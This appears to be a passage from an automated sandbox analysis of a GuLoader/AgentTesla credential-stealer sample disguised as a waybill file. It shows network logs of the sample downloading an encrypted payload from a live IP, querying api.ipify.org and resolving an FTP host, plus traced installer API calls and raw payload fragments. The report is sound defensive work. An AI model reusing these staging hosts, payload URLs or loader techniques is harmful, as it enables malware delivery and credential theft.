Dec 18, 2024 11:08:10.421477079 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.421634912 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.421685934 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.422229052 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.422300100 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.422382116 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.422441006 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.422480106 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.422539949 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.424354076 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.424395084 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.424448013 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.424448013 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.425508022 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.425664902 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.425894976 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.425988913 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.427365065 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.427462101 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.427583933 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.428576946 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.428679943 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:12.454668045 CET	49712	443	192.168.2.8	104.26.13.205
Dec 18, 2024 11:08:12.454710960 CET	443	49712	104.26.13.205	192.168.2.8
Dec 18, 2024 11:08:12.454824924 CET	49712	443	192.168.2.8	104.26.13.205
Dec 18, 2024 11:08:12.488204002 CET	49712	443	192.168.2.8	104.26.13.205
Dec 18, 2024 11:08:12.488221884 CET	443	49712	104.26.13.205	192.168.2.8
Dec 18, 2024 11:08:13.701877117 CET	443	49712	104.26.13.205	192.168.2.8
Dec 18, 2024 11:08:13.702054024 CET	49712	443	192.168.2.8	104.26.13.205
Dec 18, 2024 11:08:13.711643934 CET	49712	443	192.168.2.8	104.26.13.205
Dec 18, 2024 11:08:13.711664915 CET	443	49712	104.26.13.205	192.168.2.8
Dec 18, 2024 11:08:13.712049007 CET	443	49712	104.26.13.205	192.168.2.8
Dec 18, 2024 11:08:13.760828972 CET	49712	443	192.168.2.8	104.26.13.205
Dec 18, 2024 11:08:15.672626019 CET	49712	443	192.168.2.8	104.26.13.205
Dec 18, 2024 11:08:15.719329119 CET	443	49712	104.26.13.205	192.168.2.8
Dec 18, 2024 11:08:16.000083923 CET	443	49712	104.26.13.205	192.168.2.8
Dec 18, 2024 11:08:16.000176907 CET	443	49712	104.26.13.205	192.168.2.8
Dec 18, 2024 11:08:16.000304937 CET	49712	443	192.168.2.8	104.26.13.205
Dec 18, 2024 11:08:16.006190062 CET	49712	443	192.168.2.8	104.26.13.205

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 11:08:12.298903942 CET	55382	53	192.168.2.8	1.1.1.1
Dec 18, 2024 11:08:12.435798883 CET	53	55382	1.1.1.1	192.168.2.8
Dec 18, 2024 11:08:20.093815088 CET	49847	53	192.168.2.8	1.1.1.1
Dec 18, 2024 11:08:20.578459978 CET	53	49847	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 11:08:12.298903942 CET	192.168.2.8	1.1.1.1	0xffcf	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:08:20.093815088 CET	192.168.2.8	1.1.1.1	0xdb5	Standard query (0)	ftp.concaribe.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 11:08:12.435798883 CET	1.1.1.1	192.168.2.8	0xffcf	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:08:12.435798883 CET	1.1.1.1	192.168.2.8	0xffcf	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:08:12.435798883 CET	1.1.1.1	192.168.2.8	0xffcf	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:08:20.578459978 CET	1.1.1.1	192.168.2.8	0xdb5	No error (0)	ftp.concaribe.com	concaribe.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 11:08:20.578459978 CET	1.1.1.1	192.168.2.8	0xdb5	No error (0)	concaribe.com		192.185.13.234	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

84.38.133.48

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49711	84.38.133.48	80	2884	C:\Users\user\Desktop\Awb 4586109146.bat.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 11:08:08.332715988 CET	183	OUT	GET /wlSTiHSjDLYgnyIzSMV100.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 84.38.133.48 Cache-Control: no-cache
Dec 18, 2024 11:08:09.579253912 CET	1236	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Wed, 18 Dec 2024 05:15:17 GMT Accept-Ranges: bytes ETag: "9e0e8d3b51db1:0" Server: Microsoft-IIS/8.5 Date: Wed, 18 Dec 2024 10:08:08 GMT Content-Length: 241728 Data Raw: a8 c2 12 0d b2 01 de 1d 73 0e 95 7b 71 09 63 12 a7 64 31 e2 13 b2 1f 2a a1 b1 71 91 73 b4 31 6a 71 44 56 c9 e4 39 af c9 40 54 36 fa bb a5 35 6d cd fb 57 99 e0 c1 1c 29 61 c4 e4 57 fa 63 e3 a1 cb 48 43 66 cb 69 77 02 f2 6e f8 92 67 ee 75 7c 0c 0a 54 a8 b6 be 21 9b a1 a2 60 f1 ca ff 06 56 ee ea 02 e1 95 5c 91 9c 74 f5 f8 96 63 c5 e3 af 37 a8 ea 3a c8 a8 c0 f6 b9 77 bd 6a 91 3d 78 25 3d a7 85 60 c3 12 36 e4 c4 16 24 6d 95 7c d6 d1 9a e4 fb 0a 69 c6 07 6d 25 1b 93 0b c5 2f 10 34 26 40 db f1 35 7d ce 56 9c ff a3 a0 ad 01 aa cc 6f 06 e3 26 57 e9 95 bf 7a 85 54 c7 f1 f7 1a a3 43 73 9e ec ea 28 8c 8e 31 96 da c6 1a 31 11 28 0a ee 28 44 80 dc 7b 32 6e e1 83 dc 2a b9 9f 00 7e 65 1f ce 5d c3 6d b1 6f 1c a2 90 96 82 1f dd 0d 05 bb 51 5d 30 b0 36 09 0b db 40 83 af b5 cb 3b 55 1a c6 42 c4 3f 81 77 35 e5 84 b3 a7 15 b2 61 62 6f ad aa a6 6f 5d 12 9b ce d3 4a 8b ed b2 ea 53 b8 ad ce 66 fe c8 db 7d df 6d 21 b9 51 f4 d3 a2 b2 d6 6a 5c 96 59 cb d0 c8 81 4d 94 6c 3c 98 df 46 67 1d 1f 18 d3 44 e2 71 89 95 6d 21 29 3a ca [TRUNCATED] Data Ascii: s{qcd1qs1jqDV9@T65mW)aWcHCfiwngu\|T!`V\tc7:wj=x%=`6$m\|im%/4&@5}Vo&WzTCs(11((D{2n~e]moQ]06@;UB?w5aboo]JSf}m!Qj\YMl<FgDqm!):3I[4ojubWKgP4,hNm2Bg3EewN.zfofGrPBlQ1CkMS9t(yc5W:w\|w[?2Q6z8F&`#;X\|cLAcnFox\|{oa>OQ/_1FAC{y)@Z^}e?9N<S9Ofbg]48lGN}T[yJ";?:~\%d)a,})jg 0x2NHQ3#Ju,r^Y&hDkbth&dj/$Rzy7xT`x cyHM]#1GP!1/)bD_@i*l^9pDhJf>a>Z#;t_M1VgTOIwzjLx-akR.O[.20=[TIKxo5]pa?0sDXg}I)j\|\| \|
Dec 18, 2024 11:08:09.579350948 CET	224	IN	Data Raw: 72 e0 06 94 7f 35 a1 c3 aa 7e 41 73 97 c6 ab 86 a4 85 8d 8c b3 3b 4a b9 dc 13 bb 49 43 12 fe 59 e5 a3 8b 8a 33 9f 08 8f 2f 13 7f 0f b1 d5 00 3e 79 b9 fe e6 87 74 10 0c 82 8b 8a 64 92 ff 9f 6c cb 25 4b 4c 75 25 a2 c7 08 dd 80 e9 05 f3 ab 16 84 3d Data Ascii: r5~As;JICY3/>ytdl%KLu%=GB3M}~U*!4t^;>ZGEg[!Kdz@U'm"h:(}b_gtmKY\`9q~xJ\@vNWqB48{i
Dec 18, 2024 11:08:09.579385996 CET	1236	IN	Data Raw: d8 8b 90 1c 8f 3f ff 40 fa ef 0c aa 69 a3 7a 8f 52 95 13 75 a5 ba a3 8d 79 ff ca 16 34 55 16 e9 93 6c 15 f6 7d de 29 cd b5 0e ba 72 06 b8 fd c6 fd a8 28 e0 84 b8 31 1b 31 80 21 77 8d 07 73 0c 53 7d dc b1 db 6d 3b 3b e1 d6 43 67 20 ba 62 1a 6f 7a Data Ascii: ?@izRuy4Ul})r(11!wsS}m;;Cg bozk{ !#d=x:qGb,C`VuoBiJ\v-c&ne\|RtZ5FUHiwLnu\| !Gv~BIJ(:dj
Dec 18, 2024 11:08:09.579422951 CET	1236	IN	Data Raw: 12 59 ce af 07 99 d4 41 23 c0 c0 30 cd 0a eb 82 3f 90 95 7f e9 9b ba 9a dd b0 5e c2 b6 6f 82 75 ce 6a 9c eb 10 58 c1 7d 0c c2 62 0e d0 d8 cc 4b 1d 0e 47 42 67 9b 70 36 a4 8b 54 6d 60 9f 13 56 bd f9 3a ba c4 1f 84 f0 23 dd 7a 66 65 62 db d6 f2 73 Data Ascii: YA#0?^oujX}bKGBgp6Tm`V:#zfebs{uI >7tJ4Hcq}\SMUX(;XL2#qs_598^e(MktjY:R Y"m-J=l.~C~@ZI
Dec 18, 2024 11:08:09.579479933 CET	1236	IN	Data Raw: 2d f7 c2 98 f7 75 ad 6b 2d 48 aa 12 fe 5d cf bd 76 f1 d9 1f 08 8b 05 b1 fd 0c 33 3f 00 3e fd 93 60 e4 7c 1f 10 0c 86 21 57 66 11 82 8b 6c 4b a1 e1 52 22 30 2f a5 64 bc 8a bf 68 d0 a4 9f f7 52 88 cb 3c a0 f4 fb ea 2f 17 ac d4 20 d5 e2 e3 7d 84 7a Data Ascii: -uk-H]v3?>`\|!WflKR"0/dhR</ }zj*X<v#96K!4z(TNBk{Hh2UXNg\|laFv3DVBZ+{3#cL,#8:~zAa5;hqhh[Ml/.6Uk
Dec 18, 2024 11:08:09.579514980 CET	672	IN	Data Raw: bb e9 60 c2 40 5a e2 df 18 61 e3 3a 7c 0c fd 64 13 02 19 46 de c7 4f 06 4a 74 15 7a f6 ce cb a5 6f 27 05 88 d2 03 48 35 c3 97 86 6c 40 89 ec 8b 49 65 67 26 79 53 e5 dc 34 fb 16 63 4d 7a 85 a5 7a ac ed 00 96 cc 87 22 1e 25 9f f4 01 57 64 ab 5d f3 Data Ascii: `@Za:\|dFOJtzo'H5l@Ieg&yS4cMzz"%Wd]yqsTRdXC&<_h.5ClY3x"!>0u`[L kdjS/d/5zrT-%N5t.D>2;I!IxUN[mPJ:
Dec 18, 2024 11:08:09.655630112 CET	1236	IN	Data Raw: 75 26 f0 36 03 d5 d5 44 83 53 b8 cf 3f 27 0f c6 42 b4 17 96 73 35 ef 26 4d ab 16 b2 41 46 6b ad aa d6 0c 5d 12 eb 6c 2d 44 88 ad 1f f2 53 a8 a7 bc 19 fe c8 ab 55 c6 6d 21 af af fd d3 a2 c0 ab 7a 5c e6 71 d6 d0 c8 8b 65 87 6e 3c 0a c7 c7 67 4a 1f Data Ascii: u&6DS?'Bs5&MAFk]l-DSUm!z\qen<gJ>-Hrh!)3FI:[4oubWK^iV!&2Ng6>GgAfEk[K ;'zf7%?%mSw^(yc56~:wY\|u)n?
Dec 18, 2024 11:08:09.655673981 CET	1236	IN	Data Raw: 57 7c b4 f6 97 f3 4e 1b a9 6a 25 27 89 4c 97 79 51 7e 5b 52 9e b4 91 15 f1 ad 3e bc 96 d6 ef cf 4e f9 e6 de 97 8b 42 79 8b ad b5 5e 8f aa c9 f7 f7 22 63 13 36 9e 12 ab 2f 8f a6 fb 7d fa aa e4 3f 15 28 f4 e2 2c 44 1b ed 78 33 61 c0 8f dc 2a 1f 11 Data Ascii: W\|Nj%'LyQ~[R>NBy^"c6/}?(,Dx3a*5~m0SmOQ-:+A53Ql?aBh7-r},QphUMlNED"wh?:D[#o9bJsb%;bj`P,,u@
Dec 18, 2024 11:08:09.655694962 CET	1236	IN	Data Raw: ee 80 c8 b1 17 ee 61 d6 bb e4 d1 41 1e 5a 70 ad 28 a5 42 55 38 f2 2e eb a6 0a 86 ec df 65 c8 49 73 02 f6 6e 06 93 a1 09 75 7c b4 f4 58 a9 b6 9e 23 9b e1 a2 12 f6 c8 ff 76 f4 ce ef 02 e1 95 a2 9f 9f 74 f5 06 9a 60 c5 c3 a3 37 a8 ea c4 c9 91 d8 f6 Data Ascii: aAZp(BU8.eIsnu\|X#vt`7wCf=X/3??YG(!X]\|`?KvhZ@GFR`jLAAy:NT}#,($E`r3e(zoc_#qZ06X53TG?[5aBkSo]
Dec 18, 2024 11:08:09.655771971 CET	1236	IN	Data Raw: ef 1c 1b 9e 23 f2 f6 3e 60 08 79 5f a0 ba a6 17 3f 02 fe fd 09 65 28 c9 62 1a 65 86 7a 1e 80 09 8f 9b 85 00 ff 2e da 6b ed f5 be ba b9 84 07 e6 27 05 10 ce fe 9d 46 3d 06 56 0c 4e 3c 8b 1c 86 84 8a 29 64 0f be 3e ab c8 12 8d 2a 54 5d 82 8c 15 e7 Data Ascii: #>`y_?e(bez.k'F=VN<)d>*T]`pkJ~v~F I6~@U8xflwu\|0T(H~Ypc7wj<A63?F?/e%!\}%t`HvHA~[aiII
Dec 18, 2024 11:08:09.699529886 CET	1236	IN	Data Raw: 7a 1b ba a9 2f f2 60 9f e9 71 99 fb 42 f8 5b 1f 80 dc 43 97 78 44 56 7f db dc f0 ff 40 5b 75 39 f6 10 9f f3 18 13 8c df 7f 84 9b ed f3 5e 68 9d 0e d5 a5 da 1c a4 3f ff 40 56 aa 0c ae 68 02 62 71 53 a3 e2 74 8f f0 75 e3 75 ff c0 c8 38 59 14 c9 ee Data Ascii: z/`qB[CxDV@[u9^h?@VhbqStuu8Yz!b>PSy_L.5;1b:kxt~}&KZ>Y0dRJR$y)`/E0}&X]\@mqRDdJ}m~n,.6A6h(Y<cI~n

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49712	104.26.13.205	443	2884	C:\Users\user\Desktop\Awb 4586109146.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:08:15 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-12-18 10:08:15 UTC	425	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 10:08:15 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8f3e59c2ffef43e6-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1576&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1805813&cwnd=252&unsent_bytes=0&cid=591a1fa5d365abc2&ts=2307&x=0"
2024-12-18 10:08:15 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Target ID:	0
Start time:	05:04:10
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\Awb 4586109146.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Awb 4586109146.bat.exe"
Imagebase:	0x400000
File size:	795'558 bytes
MD5 hash:	A3BB238F798A512F7465F804735B8F9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3699835222.0000000007EAE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:07:57
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\Awb 4586109146.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Awb 4586109146.bat.exe"
Imagebase:	0x400000
File size:	795'558 bytes
MD5 hash:	A3BB238F798A512F7465F804735B8F9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3908021425.00000000369E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3908021425.00000000369E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	24.2%
Dynamic/Decrypted Code Coverage:	13.9%
Signature Coverage:	20%
Total number of Nodes:	1548
Total number of Limit Nodes:	40

Executed Functions

Function 0040338F Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004033B2
GetVersion.KERNEL32 ref: 004033B8
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
OleInitialize.OLE32(00000000), ref: 0040342F
SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040344B
GetCommandLineW.KERNEL32(Footballer Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",00000020,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",00000000,?,00000006,00000008,0000000A), ref: 00403498

Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D2
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035E3
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035EF
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403603
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040360B
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040361C
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403624
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403638

Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Footballer Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403703
ExitProcess.KERNEL32 ref: 00403724
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403746
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403751
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403779
DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037D3
CopyFileW.KERNEL32(C:\Users\user\Desktop\Awb 4586109146.bat.exe,0042AA08,?,?,00000006,00000008,0000000A), ref: 004037E7
CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 00403814
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
AdjustTokenPrivileges.ADVAPI32 ref: 00403882
ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
ExitProcess.KERNEL32 ref: 004038CA

Strings

\Temp, xrefs: 004035E9
C:\Users\user\AppData\Local\Temp\, xrefs: 004035C7, 004035CC, 004035E2, 004035EE, 004035FD, 0040360A, 00403616, 0040361E, 00403734, 00403745, 00403750, 0040375C, 00403769, 00403778, 00403829
TMP, xrefs: 0040361F
TEMP, xrefs: 00403617
NSIS Error, xrefs: 00403451
UXTHEME, xrefs: 004033DF, 004033E4, 004033EA
1033, xrefs: 00403633
C:\Users\user\AppData\Local\sillinesses, xrefs: 004035B5, 004036D5, 0040377F, 00403789
C:\Users\user\AppData\Local\sillinesses, xrefs: 004036E0
Footballer Setup, xrefs: 00403456
Error launching installer, xrefs: 004036BA
Low, xrefs: 00403605
"C:\Users\user\Desktop\Awb 4586109146.bat.exe", xrefs: 00403466, 0040346C, 00403660
C:\Users\user\Desktop\Awb 4586109146.bat.exe, xrefs: 004037E2
~nsu, xrefs: 0040372F
SeShutdownPrivilege, xrefs: 00403859
C:\Users\user\Desktop, xrefs: 00403756, 0040375B, 00403788
.tmp, xrefs: 0040374B

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\Awb 4586109146.bat.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\sillinesses$C:\Users\user\AppData\Local\sillinesses$C:\Users\user\Desktop$C:\Users\user\Desktop\Awb 4586109146.bat.exe$Error launching installer$Footballer Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-800099343
Opcode ID: 00f1125170beacb68a51aa9e102c224c57c9f0831100800300306249a148e2be
Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
Opcode Fuzzy Hash: 00f1125170beacb68a51aa9e102c224c57c9f0831100800300306249a148e2be
Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E

Function 00405461 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 004054BF
GetDlgItem.USER32(?,000003EE), ref: 004054CE
GetClientRect.USER32(?,?), ref: 0040550B
GetSystemMetrics.USER32(00000002), ref: 00405512
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
ShowWindow.USER32(?,00000008), ref: 004055AE
GetDlgItem.USER32(?,000003EC), ref: 004055CF
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
GetDlgItem.USER32(?,000003F8), ref: 004054DD

Part of subcall function 00404266: SendMessageW.USER32(00000028,?,?,00404091), ref: 00404274

GetDlgItem.USER32(?,000003EC), ref: 00405621
CreateThread.KERNELBASE(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
CloseHandle.KERNELBASE(00000000), ref: 00405636
ShowWindow.USER32(00000000), ref: 0040565A
ShowWindow.USER32(0001043E,00000008), ref: 0040565F
ShowWindow.USER32(00000008), ref: 004056A9
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
CreatePopupMenu.USER32 ref: 004056EE
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
GetWindowRect.USER32(?,?), ref: 00405722
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
OpenClipboard.USER32(00000000), ref: 00405783
EmptyClipboard.USER32 ref: 00405789
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
GlobalLock.KERNEL32(00000000), ref: 0040579F
SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
GlobalUnlock.KERNEL32(00000000), ref: 004057D3
SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
CloseClipboard.USER32 ref: 004057E4

Strings

{, xrefs: 004056C7

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
